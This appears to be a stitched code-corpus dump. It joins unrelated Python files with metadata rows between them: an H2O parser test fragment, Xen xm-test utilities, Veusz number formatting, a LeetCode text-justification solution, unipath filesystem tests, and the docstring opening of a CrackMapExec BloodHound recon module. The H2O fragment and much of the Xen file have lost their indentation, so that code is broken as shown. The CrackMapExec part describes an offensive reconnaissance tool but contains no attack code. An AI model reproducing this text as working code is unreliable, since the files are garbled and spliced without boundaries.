path_semi = "smalldata/parser/semi.scsv"
semi_test = h2o.import_file(path=pyunit_utils.locate(path_semi), destination_frame="semi_hex", sep=";")
assert semi_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(semi_test.nrow))
assert semi_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(semi_test.ncol))
# Test semi colon separated files by giving NO separator argument
semi_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_semi), destination_frame="semi_hex")
assert semi_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(semi_test_noarg.nrow))
assert semi_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(semi_test_noarg.ncol))
# Test caret separated files
path_caret = "smalldata/parser/caret.csv"
caret_test = h2o.import_file(path=pyunit_utils.locate(path_caret), destination_frame="caret_hex", sep=u"^")
assert caret_test.nrow == 3 and caret_test.ncol == 3
# Test asterisk separated files
path_asterisk = "smalldata/parser/asterisk.asv"
asterisk_test = h2o.import_file(path=pyunit_utils.locate(path_asterisk), destination_frame="asterisk_hex", sep=u"*")
assert asterisk_test.nrow == 3 and asterisk_test.ncol == 3
if __name__ == "__main__":
pyunit_utils.standalone_test(separator_test)
else:
separator_test()
| apache-2.0 | 7,092,311,872,023,976,000 | 59.529412 | 120 | 0.706997 | false |
abligh/xen4.2-minideb | tools/xm-test/lib/XmTestLib/Xm.py | 42 | 6036 | #!/usr/bin/python
"""
Copyright (C) International Business Machines Corp., 2005
Author: Dan Smith <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; under version 2 of the License.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
##
## These are miscellaneous utility functions that query xm
##
import commands
import re
import os
import time
from Test import *;
class XmError(Exception):
def __init__(self, msg, trace="", status=0):
self.msg = msg
self.trace = trace
try:
self.status = int(status)
except Exception, e:
self.status = -1
def __str__(self):
        return self.trace
def domid(name):
status, output = traceCommand("xm domid " + name);
if status != 0 or "Traceback" in output:
return -1
if output == "None":
return -1
try:
return int(output)
except:
raise XmError("xm domid failed", trace=output, status=status)
def domname(id):
status, output = traceCommand("xm domname " + str(id));
return output;
def isDomainRunning(domain):
id = domid(domain);
if id == -1:
return False;
else:
return True;
def getRunningDomains():
status, output = traceCommand("xm list");
if status != 0 or "Traceback" in output:
raise XmError("xm failed", trace=output, status=status)
lines = output.splitlines();
domains = [];
for l in lines[1:]:
elms = l.split(" ", 1);
domains.append(elms[0]);
return domains;
def destroyDomU(name):
status, output = traceCommand("xm destroy " + name, logOutput=False);
return status;
def destroyAllDomUs():
if verbose:
print "*** Cleaning all running domU's"
attempt = 0
trying = True
while trying:
try:
attempt += 1
domainList = getRunningDomains()
trying = False
except XmError, e:
if attempt >= 10:
FAIL("XM-TEST: xm list not responding")
time.sleep(1)
print e.trace
print "!!! Trying again to get a clean domain list..."
for d in domainList:
if not d == "Domain-0":
destroyDomU(d);
if verbose:
print "*** Finished cleaning domUs"
def getDomMem(domain):
status, output = traceCommand("xm list")
if status != 0:
if verbose:
print "xm list failed with %i" % status
return None
lines = re.split("\n", output)
for line in lines:
fields = re.sub(" +", " ", line).split()
if domain.isdigit():
if fields[1] == domain:
return int(fields[2])
else:
if fields[0] == domain:
return int(fields[2])
if verbose:
print "Did not find domain " + str(domain)
return None
def getDomInfo(domain, key, opts=None):
if opts:
cmd = "xm list %s" % opts
else:
cmd = "xm list"
status, output = traceCommand(cmd)
if status != 0:
if verbose:
print "xm list failed with %i" % status
return None
lines = output.split("\n")
# Get the key values from the first line headers
cleanHeader = re.sub("\([^\)]+\)", "", lines[0])
colHeaders = re.split(" +", cleanHeader)
doms = {}
for line in lines[1:]:
domValues = {}
values = re.split(" +", line)
i = 1
for value in values[1:]:
domValues[colHeaders[i]] = value
i += 1
doms[values[0]] = domValues
if doms.has_key(domain) and doms[domain].has_key(key):
return doms[domain].get(key)
return ""
def getVcpuInfo(domain):
status, output = traceCommand("xm vcpu-list %s" % domain)
lines = output.split("\n")
vcpus = {}
for line in lines[1:]:
cols = re.split(" +", line)
if cols[3] == '-':
vcpus[int(cols[2])] = None
else:
vcpus[int(cols[2])] = int(cols[3])
return vcpus
def getInfo(key):
info = {}
status, output = traceCommand("xm info")
lines = output.split("\n")
for line in lines:
match = re.match("^([A-z_]+)[^:]*: (.*)$", line)
if match:
info[match.group(1)] = match.group(2)
if info.has_key(key):
return info[key]
else:
return ""
def restartXend():
if verbose:
print "*** Restarting xend ..."
if os.access("/etc/init.d/xend", os.X_OK):
status, output = traceCommand("/etc/init.d/xend stop")
time.sleep(1)
status, output = traceCommand("/etc/init.d/xend start")
return status
else:
status, output = traceCommand("xend stop")
time.sleep(1)
status, output = traceCommand("xend start")
return status
def smpConcurrencyLevel():
nr_cpus = int(getInfo("nr_cpus"))
return nr_cpus
if __name__ == "__main__":
if isDomainRunning("0"):
print "Domain-0 is running; I must be working!"
else:
print "Domain-0 is not running; I may be broken!"
mem = getDomMem("Domain-0")
if not mem:
print "Failed to get memory for Domain-0!"
else:
print "Domain-0 mem: %i" % mem
cpu = getDomInfo("Domain-0", "CPU")
state = getDomInfo("Domain-0", "State")
print "Domain-0 CPU: " + cpu
print "Domain-0 state: " + state
v = getVcpuInfo("Domain-0")
for key in v.keys():
print "VCPU%i is on CPU %i" % (key, v[key])
| gpl-2.0 | 7,654,133,770,707,412,000 | 23.636735 | 74 | 0.571902 | false |
KDB2/veusz | veusz/utils/formatting.py | 3 | 7908 | # Copyright (C) 2010 Jeremy S. Sanders
# Email: Jeremy Sanders <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
from __future__ import division
import re
import math
import numpy as N
from . import dates
_formaterror = 'FormatError'
# a format statement in a string
_format_re = re.compile(r'%([-#0-9 +.hlL]*?)([diouxXeEfFgGcrs%])')
def localeFormat(totfmt, args, locale=None):
"""Format using fmt statement fmt, qt QLocale object locale and
arguments to formatting args.
* arguments are not supported in this formatting, nor is using
a dict to supply values for statement
"""
# substitute all format statements with string format statements
newfmt = _format_re.sub("%s", totfmt)
# do formatting separately for all statements
strings = []
i = 0
for f in _format_re.finditer(totfmt):
code = f.group(2)
if code == '%':
s = '%'
else:
try:
s = f.group() % args[i]
i += 1
except IndexError:
raise TypeError("Not enough arguments for format string")
if locale is not None and code in 'eEfFgG':
s = s.replace('.', locale.decimalPoint())
strings.append(s)
if i != len(args):
raise TypeError("Not all arguments converted during string formatting")
return newfmt % tuple(strings)
def sciToHuman(val, cleanup=False):
"""Convert output from C formatting to human scientific notation.
if cleanup, remove zeros after decimal points
"""
# split around the exponent
leader, exponent = val.split('e')
# strip off trailing decimal point and zeros if no format args
if cleanup and leader.find('.') >= 0:
leader = leader.rstrip('0').rstrip('.')
# trim off leading 1
if leader == '1' and cleanup:
leader = ''
else:
# add multiply sign
leader += u'\u00d7'
return '%s10^{%i}' % (leader, int(exponent))
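# Examples of the conversion (inputs are strings produced by a prior '%e' format):
#   sciToHuman('3.1400000000e-08', cleanup=True)  ->  '3.14\u00d710^{-8}'   (i.e. 3.14x10^{-8})
#   sciToHuman('1.0000000000e+05', cleanup=True)  ->  '10^{5}'   (the leading "1x" is dropped)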
def formatSciNotation(num, formatargs, locale=None):
"""Format number into form X \times 10^{Y}.
This function trims trailing zeros and decimal point unless a formatting
argument is supplied
This is similar to the %e format string
formatargs is the standard argument in a format string to control the
number of decimal places, etc.
locale is a QLocale object
"""
# handle nan, inf, -inf
if not N.isfinite(num):
return str(num)
# create an initial formatting string
if formatargs:
formatstr = '%' + formatargs + 'e'
else:
formatstr = '%.10e'
# do formatting, catching errors
try:
text = formatstr % num
except:
return _formaterror
text = sciToHuman(text, cleanup=formatargs=='')
# do substitution of decimals
if locale is not None:
text = text.replace('.', locale.decimalPoint())
return text
def formatGeneral(num, fmtarg, locale=None):
"""General formatting which switches from normal to scientic
notation."""
if fmtarg:
# if an argument is given, we convert output
try:
retn = ('%'+fmtarg+'g') % num
except ValueError:
retn = _formaterror
if retn.find('e') >= 0:
# in scientific notation, so convert
retn = sciToHuman(retn, cleanup=False)
else:
a = abs(num)
# manually choose when to switch from normal to scientific
# as the default %g isn't very good
if a >= 1e4 or (a < 1e-2 and a > 1e-110):
retn = formatSciNotation(num, fmtarg, locale=locale)
else:
retn = '%.10g' % num
if locale is not None:
# replace decimal point with correct decimal point
retn = retn.replace('.', locale.decimalPoint())
return retn
engsuffixes = ( 'y', 'z', 'a', 'f', 'p', 'n',
u'\u03bc', 'm', '', 'k', 'M', 'G',
'T', 'P', 'E', 'Z', 'Y' )
def formatEngineering(num, fmtarg, locale=None):
"""Engineering suffix format notation using SI suffixes."""
if num != 0.:
logindex = math.log10( abs(num) ) / 3.
# for numbers < 1 round down suffix
if logindex < 0. and (int(logindex)-logindex) > 1e-6:
logindex -= 1
# make sure we don't go out of bounds
logindex = min( max(logindex, -8),
len(engsuffixes) - 9 )
suffix = engsuffixes[ int(logindex) + 8 ]
val = num / 10**( int(logindex) *3)
else:
suffix = ''
val = num
text = ('%' + fmtarg + 'g%s') % (val, suffix)
if locale is not None:
text = text.replace('.', locale.decimalPoint())
return text
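# Examples using the SI suffix table above (values are illustrative):
#   formatEngineering(4.7e-9, '.3')  ->  '4.7n'
#   formatEngineering(2.2e7, '.3')   ->  '22M'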
# catch general veusz formatting expression
_formatRE = re.compile(r'%([-0-9.+# ]*)(VDVS|VD.|V.|[A-Za-z%])')
def formatNumber(num, formatstr, locale=None):
""" Format a number in different ways.
formatstr is a standard C format string, with some additions:
%Ve scientific notation X \times 10^{Y}
%Vg switches from normal notation to scientific outside 10^-2 to 10^4
%VE engineering suffix option
%VDx date formatting, where x is one of the arguments in
http://docs.python.org/lib/module-time.html in the function
strftime
"""
outitems = []
while formatstr:
# repeatedly try to do string format
match = _formatRE.search(formatstr)
if not match:
outitems.append(formatstr)
break
# argument and type of formatting
farg, ftype = match.groups()
# special veusz formatting
if ftype[:1] == 'V':
# special veusz formatting
if ftype == 'Ve':
out = formatSciNotation(num, farg, locale=locale)
elif ftype == 'Vg':
out = formatGeneral(num, farg, locale=locale)
elif ftype == 'VE':
out = formatEngineering(num, farg, locale=locale)
elif ftype[:2] == 'VD':
d = dates.floatToDateTime(num)
# date formatting (seconds since start of epoch)
if ftype[:4] == 'VDVS':
# special seconds operator
out = ('%'+ftype[4:]+'g') % (d.second+d.microsecond*1e-6)
else:
# use date formatting
try:
out = d.strftime(str('%'+ftype[2:]))
except ValueError:
out = _formaterror
else:
out = _formaterror
# replace hyphen with true minus sign
out = out.replace('-', u'\u2212')
elif ftype == '%':
out = '%'
else:
# standard C formatting
try:
out = localeFormat('%' + farg + ftype, (num,),
locale=locale)
except:
out = _formaterror
outitems.append(formatstr[:match.start()])
outitems.append(out)
formatstr = formatstr[match.end():]
return ''.join(outitems)
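# A few examples of the extended format codes (locale=None, so '.' stays the decimal
# point; the minus sign in %V... output is the unicode minus):
#   formatNumber(31415.9, '%.1f')  ->  '31415.9'                # plain C-style formatting
#   formatNumber(31415.9, '%Vg')   ->  '3.14159\u00d710^{4}'    # auto scientific notation
#   formatNumber(0.000047, '%VE')  ->  '47\u03bc'               # engineering suffix (micro)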
| gpl-2.0 | -4,821,300,512,050,054,000 | 31.146341 | 79 | 0.570182 | false |
yaoxuanw007/forfun | leetcode/python/textJustification.py | 1 | 1833 | # https://oj.leetcode.com/problems/text-justification/
class Solution:
# @param words, a list of strings
# @param L, an integer
# @return a list of strings
def fullJustify(self, words, L):
count, line, lines = 0, [], []
for word in words:
count += len(word)
if count > L:
count -= len(word)
lines.append(self.createLine(L, line, count, False))
# prepare for next line
line = [word]
count = len(word) + 1
else:
line.append(word)
count += 1
# special case: words is empty
if len(words) > 0:
lines.append(self.createLine(L, line, count, True))
# print [len(x) for x in lines]
return lines
# generate each line
def createLine(self, L, line, count, isLastLine):
    # count included one space per word; add them back so extraLen is the total number of spaces to distribute
extraLen = L - count + len(line)
slotCount = len(line) - 1
# special case: one word per line
if slotCount == 0:
slotLen = 0
extraCount = 0
# special case: last line (multiple words)
elif isLastLine:
slotLen = 1
extraCount = 0
extraLen -= len(line)
else:
slotLen = extraLen / slotCount
extraCount = extraLen % slotCount
extraLen = 0
# process current line
currLine = ""
for currWord in line:
currLine += currWord
currLine += (" " * slotLen)
if extraCount > 0:
currLine += " "
extraCount -= 1
currLine += (" " * extraLen)
# special case: one word in non-last line
if slotCount > 0 and not isLastLine:
# remove last slotLen
return currLine[:-1*slotLen]
else:
return currLine
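# For the sample call below with L = 16 the method yields the fully justified lines
#   ["This    is    an", "example  of text", "justification.  "]
# (extra spaces go to the leftmost slots; the last line is left-justified and padded).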
s = Solution()
print s.fullJustify(["This", "is", "an", "example", "of", "text", "justification."], 16)
print s.fullJustify([], 16)
print s.fullJustify(["What","must","be","shall","be."], 12)
| mit | -2,375,941,334,285,857,000 | 25.565217 | 88 | 0.585379 | false |
strogo/djpcms | djpcms/utils/unipath/test.py | 1 | 19686 | #!/usr/bin/env python
"""Unit tests for unipath.py and unipath_purist.py
Environment variables:
DUMP : List the contents of test directories after each test.
NO_CLEANUP : Don't delete test directories.
(These are not command-line args due to the difficulty of merging my args
with unittest's.)
IMPORTANT: Tests may not assume what the current directory is because the tests
may have been started from anywhere, and some tests chdir to the temporary
test directory which is then deleted.
"""
import ntpath
import os
import posixpath
import tempfile
import time
import sys
from nose.tools import eq_, raises
# Package imports
from djpcms.utils.unipath import *
from djpcms.utils.unipath.errors import *
from djpcms.utils.unipath.tools import dict2dir, dump_path
AbstractPath.auto_norm = False
class PosixPath(AbstractPath):
pathlib = posixpath
class NTPath(AbstractPath):
pathlib = ntpath
# Global flags
cleanup = not bool(os.environ.get("NO_CLEANUP"))
dump = bool(os.environ.get("DUMP"))
def r(exception, func, *args, **kw):
"""This is supposed to exist in nose.tools as assert_raises(), but it
doesn't.
"""
try:
func(*args, **kw)
except exception:
pass
except Exception, e:
tup = exception.__name__, e.__class__.__name__, e
raise AssertionError("expected %s, caught %s: %s" % tup)
else:
raise AssertionError("function didn't raise %s" % exception.__name__)
class TestPathConstructor(object):
def test_posix(self):
eq_(str(PosixPath()), posixpath.curdir)
eq_(str(PosixPath("foo/bar.py")), "foo/bar.py")
eq_(str(PosixPath("foo", "bar.py")), "foo/bar.py")
eq_(str(PosixPath("foo", "bar", "baz.py")), "foo/bar/baz.py")
eq_(str(PosixPath("foo", PosixPath("bar", "baz.py"))), "foo/bar/baz.py")
eq_(str(PosixPath("foo", ["", "bar", "baz.py"])), "foo/bar/baz.py")
eq_(str(PosixPath("")), "")
eq_(str(PosixPath()), ".")
eq_(str(PosixPath("foo", 1, "bar")), "foo/1/bar")
def test_nt(self):
eq_(str(NTPath()), ntpath.curdir)
eq_(str(NTPath(r"foo\bar.py")), r"foo\bar.py")
eq_(str(NTPath("foo", "bar.py")), r"foo\bar.py")
eq_(str(NTPath("foo", "bar", "baz.py")), r"foo\bar\baz.py")
eq_(str(NTPath("foo", NTPath("bar", "baz.py"))), r"foo\bar\baz.py")
eq_(str(NTPath("foo", ["", "bar", "baz.py"])), r"foo\bar\baz.py")
eq_(str(PosixPath("")), "")
eq_(str(NTPath()), ".")
eq_(str(NTPath("foo", 1, "bar")), r"foo\1\bar")
class TestNorm(object):
def test_posix(self):
eq_(PosixPath("a//b/../c").norm(), "a/c")
eq_(PosixPath("a/./b").norm(), "a/b")
eq_(PosixPath("a/./b", norm=True), "a/b")
eq_(PosixPath("a/./b", norm=False), "a/./b")
class AutoNormPath(PosixPath):
auto_norm = True
eq_(AutoNormPath("a/./b"), "a/b")
eq_(AutoNormPath("a/./b", norm=True), "a/b")
eq_(AutoNormPath("a/./b", norm=False), "a/./b")
def test_nt(self):
eq_(NTPath(r"a\\b\..\c").norm(), r"a\c")
eq_(NTPath(r"a\.\b").norm(), r"a\b")
eq_(NTPath("a\\.\\b", norm=True), "a\\b")
eq_(NTPath("a\\.\\b", norm=False), "a\\.\\b")
class AutoNormPath(NTPath):
auto_norm = True
eq_(AutoNormPath("a\\.\\b"), "a\\b")
eq_(AutoNormPath("a\\.\\b", norm=True), "a\\b")
eq_(AutoNormPath("a\\.\\b", norm=False), "a\\.\\b")
class TestAbstractPath(object):
def test_repr(self):
eq_(repr(Path("la_la_la")), "Path('la_la_la')")
eq_(repr(NTPath("la_la_la")), "NTPath('la_la_la')")
# Not testing expand_user, expand_vars, or expand: too dependent on the
# OS environment.
def test_properties(self):
p = PosixPath("/first/second/third.jpg")
eq_(p.parent, "/first/second")
eq_(p.name, "third.jpg")
eq_(p.ext, ".jpg")
eq_(p.stem, "third")
def test_properties2(self):
# Usage sample in README is based on this.
p = PosixPath("/usr/lib/python2.5/gopherlib.py")
eq_(p.parent, Path("/usr/lib/python2.5"))
eq_(p.name, Path("gopherlib.py"))
eq_(p.ext, ".py")
eq_(p.stem, Path("gopherlib"))
q = PosixPath(p.parent, p.stem + p.ext)
eq_(q, p)
def test_split_root(self):
eq_(PosixPath("foo/bar.py").split_root(), ("", "foo/bar.py"))
eq_(PosixPath("/foo/bar.py").split_root(), ("/", "foo/bar.py"))
eq_(NTPath("foo\\bar.py").split_root(), ("", "foo\\bar.py"))
eq_(NTPath("\\foo\\bar.py").split_root(), ("\\", "foo\\bar.py"))
eq_(NTPath("C:\\foo\\bar.py").split_root(), ("C:\\", "foo\\bar.py"))
eq_(NTPath("C:foo\\bar.py").split_root(), ("C:", "foo\\bar.py"))
eq_(NTPath("\\\\share\\base\\foo\\bar.py").split_root(), ("\\\\share\\base\\", "foo\\bar.py"))
def test_split_root_vs_isabsolute(self):
assert not PosixPath("a/b/c").isabsolute()
assert not PosixPath("a/b/c").split_root()[0]
assert PosixPath("/a/b/c").isabsolute()
assert PosixPath("/a/b/c").split_root()[0]
assert not NTPath("a\\b\\c").isabsolute()
assert not NTPath("a\\b\\c").split_root()[0]
assert NTPath("\\a\\b\\c").isabsolute()
assert NTPath("\\a\\b\\c").split_root()[0]
assert NTPath("C:\\a\\b\\c").isabsolute()
assert NTPath("C:\\a\\b\\c").split_root()[0]
assert NTPath("C:a\\b\\c").isabsolute()
assert NTPath("C:a\\b\\c").split_root()[0]
assert NTPath("\\\\share\\b\\c").isabsolute()
assert NTPath("\\\\share\\b\\c").split_root()[0]
def test_components(self):
P = PosixPath
eq_(P("a").components(), [P(""), P("a")])
eq_(P("a/b/c").components(), [P(""), P("a"), P("b"), P("c")])
eq_(P("/a/b/c").components(), [P("/"), P("a"), P("b"), P("c")])
P = NTPath
eq_(P("a\\b\\c").components(), [P(""), P("a"), P("b"), P("c")])
eq_(P("\\a\\b\\c").components(), [P("\\"), P("a"), P("b"), P("c")])
eq_(P("C:\\a\\b\\c").components(), [P("C:\\"), P("a"), P("b"), P("c")])
eq_(P("C:a\\b\\c").components(), [P("C:"), P("a"), P("b"), P("c")])
eq_(P("\\\\share\\b\\c").components(), [P("\\\\share\\b\\"), P("c")])
def test_child(self):
PosixPath("foo/bar").child("baz")
r(UnsafePathError, PosixPath("foo/bar").child, "baz/fred")
r(UnsafePathError, PosixPath("foo/bar").child, "..", "baz")
r(UnsafePathError, PosixPath("foo/bar").child, ".", "baz")
class TestStringMethods(object):
def test_add(self):
P = PosixPath
eq_(P("a") + P("b"), P("ab"))
eq_(P("a") + "b", P("ab"))
eq_("a" + P("b"), P("ab"))
class FilesystemTest(object):
TEST_HIERARCHY = {
"a_file": "Nothing important.",
"animals": {
"elephant": "large",
"gonzo": "unique",
"mouse": "small"},
"images": {
"image1.gif": "",
"image2.jpg": "",
"image3.png": ""},
"swedish": {
"chef": {
"bork": {
"bork": "bork!"}}},
}
def setUp(self):
self.d = d = Path(tempfile.mkdtemp())
dict2dir(d, self.TEST_HIERARCHY)
self.a_file = Path(d, "a_file")
self.animals = Path(d, "animals")
self.images = Path(d, "images")
self.chef = Path(d, "swedish", "chef", "bork", "bork")
if hasattr(self.d, "write_link"):
self.link_to_chef_file = Path(d, "link_to_chef_file")
self.link_to_chef_file.write_link(self.chef)
self.link_to_images_dir = Path(d, "link_to_images_dir")
self.link_to_images_dir.write_link(self.images)
self.dead_link = self.d.child("dead_link")
self.dead_link.write_link("nowhere")
self.missing = Path(d, "MISSING")
self.d.chdir()
def tearDown(self):
d = self.d
d.parent.chdir() # Always need a valid curdir to avoid OSErrors.
if dump:
dump_path(d)
if cleanup:
d.rmtree()
if d.exists():
raise AssertionError("unable to delete temp dir %s" % d)
else:
print "Not deleting test directory", d
class TestCalculatingPaths(FilesystemTest):
def test_inheritance(self):
assert Path.cwd().name # Can we access the property?
def test_cwd(self):
eq_(str(Path.cwd()), os.getcwd())
def test_chdir_absolute_relative(self):
save_dir = Path.cwd()
self.d.chdir()
eq_(Path.cwd(), self.d)
eq_(Path("swedish").absolute(), Path(self.d, "swedish"))
save_dir.chdir()
eq_(Path.cwd(), save_dir)
def test_chef(self):
p = Path(self.d, "swedish", "chef", "bork", "bork")
eq_(p.read_file(), "bork!")
def test_absolute(self):
p1 = Path("images").absolute()
p2 = self.d.child("images")
eq_(p1, p2)
def test_relative(self):
p = self.d.child("images").relative()
eq_(p, "images")
def test_resolve(self):
p1 = Path(self.link_to_images_dir, "image3.png")
p2 = p1.resolve()
eq_(p1.components()[-2:], ["link_to_images_dir", "image3.png"])
eq_(p2.components()[-2:], ["images", "image3.png"])
assert p1.exists()
assert p2.exists()
assert p1.same_file(p2)
assert p2.same_file(p1)
class TestRelPathTo(FilesystemTest):
def test1(self):
p1 = Path("animals", "elephant")
p2 = Path("animals", "mouse")
eq_(p1.rel_path_to(p2), Path("mouse"))
def test2(self):
p1 = Path("animals", "elephant")
p2 = Path("images", "image1.gif")
eq_(p1.rel_path_to(p2), Path(os.path.pardir, "images", "image1.gif"))
def test3(self):
p1 = Path("animals", "elephant")
eq_(p1.rel_path_to(self.d), Path(os.path.pardir))
    def test4(self):
p1 = Path("swedish", "chef")
eq_(p1.rel_path_to(self.d), Path(os.path.pardir, os.path.pardir))
class TestListingDirectories(FilesystemTest):
def test_listdir_names_only(self):
result = self.images.listdir(names_only=True)
control = ["image1.gif", "image2.jpg", "image3.png"]
eq_(result, control)
def test_listdir_arg_errors(self):
r(TypeError, self.d.listdir, filter=FILES, names_only=True)
def test_listdir(self):
result = Path("images").listdir()
control = [
Path("images", "image1.gif"),
Path("images", "image2.jpg"),
Path("images", "image3.png")]
eq_(result, control)
def test_listdir_all(self):
result = Path("").listdir()
control = [
"a_file",
"animals",
"dead_link",
"images",
"link_to_chef_file",
"link_to_images_dir",
"swedish",
]
eq_(result, control)
def test_listdir_files(self):
result = Path("").listdir(filter=FILES)
control = [
"a_file",
"link_to_chef_file",
]
eq_(result, control)
def test_listdir_dirs(self):
result = Path("").listdir(filter=DIRS)
control = [
"animals",
"images",
"link_to_images_dir",
"swedish",
]
eq_(result, control)
def test_listdir_links(self):
if not hasattr(self.d, "symlink"):
return
result = Path("").listdir(filter=LINKS)
control = [
"dead_link",
"link_to_chef_file",
"link_to_images_dir",
]
eq_(result, control)
def test_listdir_files_no_links(self):
result = Path("").listdir(filter=FILES_NO_LINKS)
control = [
"a_file",
]
eq_(result, control)
def test_listdir_dirs_no_links(self):
result = Path("").listdir(filter=DIRS_NO_LINKS)
control = [
"animals",
"images",
"swedish",
]
eq_(result, control)
def test_listdir_dead_links(self):
result = Path("").listdir(filter=DEAD_LINKS)
control = [
"dead_link",
]
eq_(result, control)
def test_listdir_pattern_names_only(self):
result = self.images.name.listdir("*.jpg", names_only=True)
control = ["image2.jpg"]
eq_(result, control)
def test_listdir_pattern(self):
result = self.images.name.listdir("*.jpg")
control = [Path("images", "image2.jpg")]
eq_(result, control)
def test_walk(self):
result = list(self.d.walk())
control = [
Path(self.a_file),
Path(self.animals),
Path(self.animals, "elephant"),
Path(self.animals, "gonzo"),
Path(self.animals, "mouse"),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_bottom_up(self):
result = list(self.d.walk(top_down=False))
control = [
Path(self.a_file),
Path(self.animals, "elephant"),
Path(self.animals, "gonzo"),
Path(self.animals, "mouse"),
Path(self.animals),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_files(self):
result = list(self.d.walk(filter=FILES))
control = [
Path(self.a_file),
Path(self.animals, "elephant"),
Path(self.animals, "gonzo"),
Path(self.animals, "mouse"),
Path(self.images, "image1.gif"),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_dirs(self):
result = list(self.d.walk(filter=DIRS))
control = [
Path(self.animals),
Path(self.images),
Path(self.link_to_images_dir),
Path(self.d, "swedish"),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_links(self):
result = list(self.d.walk(filter=LINKS))
control = [
Path(self.dead_link),
Path(self.link_to_chef_file),
Path(self.link_to_images_dir),
]
result = result[:len(control)]
eq_(result, control)
class TestStatAttributes(FilesystemTest):
def test_exists(self):
assert self.a_file.exists()
assert self.images.exists()
assert self.link_to_chef_file.exists()
assert self.link_to_images_dir.exists()
assert not self.dead_link.exists()
assert not self.missing.exists()
def test_lexists(self):
assert self.a_file.lexists()
assert self.images.lexists()
assert self.link_to_chef_file.lexists()
assert self.link_to_images_dir.lexists()
assert self.dead_link.lexists()
assert not self.missing.lexists()
def test_isfile(self):
assert self.a_file.isfile()
assert not self.images.isfile()
assert self.link_to_chef_file.isfile()
assert not self.link_to_images_dir.isfile()
assert not self.dead_link.isfile()
assert not self.missing.isfile()
def test_isdir(self):
assert not self.a_file.isdir()
assert self.images.isdir()
assert not self.link_to_chef_file.isdir()
assert self.link_to_images_dir.isdir()
assert not self.dead_link.isdir()
assert not self.missing.isdir()
def test_islink(self):
assert not self.a_file.islink()
assert not self.images.islink()
assert self.link_to_chef_file.islink()
assert self.link_to_images_dir.islink()
assert self.dead_link.islink()
assert not self.missing.islink()
def test_ismount(self):
# Can't test on a real mount point because we don't know where it is
assert not self.a_file.ismount()
assert not self.images.ismount()
assert not self.link_to_chef_file.ismount()
assert not self.link_to_images_dir.ismount()
assert not self.dead_link.ismount()
assert not self.missing.ismount()
def test_times(self):
assert self.a_file.atime(), 50000
assert self.a_file.ctime(), 50000
assert self.a_file.mtime(), 50000
def test_size(self):
eq_(self.chef.size(), 5)
def test_same_file(self):
if hasattr(self.a_file, "same_file"):
control = Path(self.d, "a_file")
assert self.a_file.same_file(control)
assert not self.a_file.same_file(self.chef)
def test_stat(self):
st = self.chef.stat()
assert hasattr(st, "st_mode")
def test_statvfs(self):
if hasattr(self.images, "statvfs"):
stv = self.images.statvfs()
assert hasattr(stv, "f_files")
def test_chmod(self):
self.a_file.chmod(0600)
newmode = self.a_file.stat().st_mode
eq_(newmode & 0777, 0600)
# Can't test chown: requires root privilege and knowledge of local users.
def set_times(self):
self.a_file.set_times()
self.a_file.set_times(50000)
self.a_file.set_times(50000, 60000)
class TestCreateRenameRemove(FilesystemTest):
def test_mkdir_and_rmdir(self):
self.missing.mkdir()
assert self.missing.isdir()
self.missing.rmdir()
assert not self.missing.exists()
def test_mkdir_and_rmdir_with_parents(self):
abc = Path(self.d, "a", "b", "c")
abc.mkdir(parents=True)
assert abc.isdir()
abc.rmdir(parents=True)
assert not Path(self.d, "a").exists()
def test_remove(self):
self.a_file.remove()
assert not self.a_file.exists()
self.missing.remove() # Removing a nonexistent file should succeed.
def test_rename(self):
a_file = self.a_file
b_file = Path(a_file.parent, "b_file")
a_file.rename(b_file)
assert not a_file.exists()
assert b_file.exists()
def test_rename_with_parents(self):
pass # @@MO: Write later.
class TestLinks(FilesystemTest):
# @@MO: Write test_hardlink, test_symlink, test_write_link later.
def test_read_link(self):
eq_(self.dead_link.read_link(), "nowhere")
class TestHighLevel(FilesystemTest):
def test_copy(self):
a_file = self.a_file
b_file = Path(a_file.parent, "b_file")
a_file.copy(b_file)
assert b_file.exists()
a_file.copy_stat(b_file)
def test_copy_tree(self):
return # .copy_tree() not implemented.
images = self.images
images2 = Path(self.images.parent, "images2")
images.copy_tree(images2)
def test_move(self):
a_file = self.a_file
b_file = Path(a_file.parent, "b_file")
a_file.move(b_file)
assert not a_file.exists()
assert b_file.exists()
def test_needs_update(self):
control_files = self.images.listdir()
self.a_file.set_times()
assert not self.a_file.needs_update(control_files)
time.sleep(1)
control = Path(self.images, "image2.jpg")
control.set_times()
result = self.a_file.needs_update(self.images.listdir())
assert self.a_file.needs_update(control_files)
def test_read_file(self):
eq_(self.chef.read_file(), "bork!")
# .write_file and .rmtree tested in .setUp.
| bsd-3-clause | 8,344,402,886,396,129,000 | 31.974874 | 102 | 0.5414 | false |
jorik041/CrackMapExec | cme/modules/bloodhound.py | 1 | 6435 | from cme.helpers.powershell import *
from cme.helpers.misc import validate_ntlm
from cme.helpers.logger import write_log
from sys import exit
class CMEModule:
'''
    Executes the BloodHound recon script on the target and retrieves the results onto the attackers' machine
2 supported modes :
    CSV : exports data into CSVs on the target file system before retrieving them (NOT opsec safe)
Neo4j API : exports data directly to the Neo4j API (opsec safe)
Module by Waffle-Wrath
Bloodhound.ps1 script base : https://github.com/BloodHoundAD/BloodHound
'''
